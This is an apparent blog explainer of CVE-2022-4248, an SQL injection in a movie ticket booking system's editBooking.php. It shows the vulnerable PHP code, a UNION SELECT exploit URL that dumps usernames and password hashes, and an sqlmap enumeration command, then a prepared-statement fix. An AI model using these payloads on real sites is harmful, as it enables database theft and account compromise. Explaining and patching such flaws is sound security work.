CVE-2022-4248 - Critical SQL Injection in Movie Ticket Booking System (`editBooking.php`) – Explained and Exploited

A critical vulnerability known as CVE-2022-4248 was discovered in the Movie Ticket Booking System, specifically in the editBooking.php file. This security flaw allows an attacker to manipulate the id parameter, leading to an SQL injection. Exploiting this vulnerability can give an attacker remote access to sensitive data, modify bookings, or even take full control of the database.

In this article, I’ll break down the vulnerability, show sample exploit code, discuss its risks, and include resources for further reading.

Exploit Status: Public

- Reference: VDB-214625

How Does the Vulnerability Work?

A common feature in booking systems is to allow users (or admins) to edit an existing booking, usually by specifying the booking id in the URL or form. In this case, the script does not sanitize or validate the id parameter. That lets an attacker add or inject custom SQL commands.

Here's a simplified version of the vulnerable PHP code, typically found in editBooking.php

<?php
// Vulnerable code in editBooking.php
include('dbconnect.php');

$id = $_GET['id']; // no validation or sanitization

// Dangerous query - vulnerable to SQL injection!
$query = "SELECT * FROM bookings WHERE id = $id";
$result = mysqli_query($conn, $query);

// ...rest of the code
?>

If an attacker supplies something like id=1 OR 1=1, the query becomes

SELECT * FROM bookings WHERE id = 1 OR 1=1

This will return all rows, not just the one intended booking. An attacker can do worse, such as extracting data from other tables.

Let’s walk through a real exploit scenario. Suppose the target site is

http://victim.com/editBooking.php?id=1

Exploit URL

http://victim.com/editBooking.php?id=1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users--

This payload attempts to dump usernames and password hashes from a users table. Depending on the code, this could be displayed directly in the bookings edit page, leaked in error messages, or exported by the attacker.

Automated Exploit with SQLMap

SQLMap is a popular tool for detecting and exploiting SQL injection.

Simple usage

sqlmap -u "http://victim.com/editBooking.php?id=1" --dbs

SQLMap will scan, confirm the injection, and enumerate all database names.

Any website running this Movie Ticket Booking System with the vulnerable editBooking.php.

- Especially risky if running on a public server, since exploit can be done remotely and has been disclosed publicly.

$stmt = $conn->prepare("SELECT * FROM bookings WHERE id = ?");

$stmt->bind_param('i', $_GET['id']); // 'i' means integer

More Information & Official References

- VulDB: VDB-214625 for CVE-2022-4248
- NVD: CVE-2022-4248
- SQL Injection Explained (OWASP)
- SQLMap Official Site

Conclusion

CVE-2022-4248 is a serious SQL injection vulnerability affecting the Movie Ticket Booking System. Due to the ease of exploitation and the potential data loss, it's important to patch immediately. This bug highlights how crucial it is to validate user input, especially when dealing with IDs in URLs or forms.

Stay safe & always sanitize your input!

*If you run this Movie Ticket Booking System, inspect your editBooking.php and patch it now. For more info on securing PHP apps, check out the OWASP Secure Coding Practices.*

Timeline

Published on: 12/01/2022 08:15:00 UTC
Last modified on: 12/02/2022 18:26:00 UTC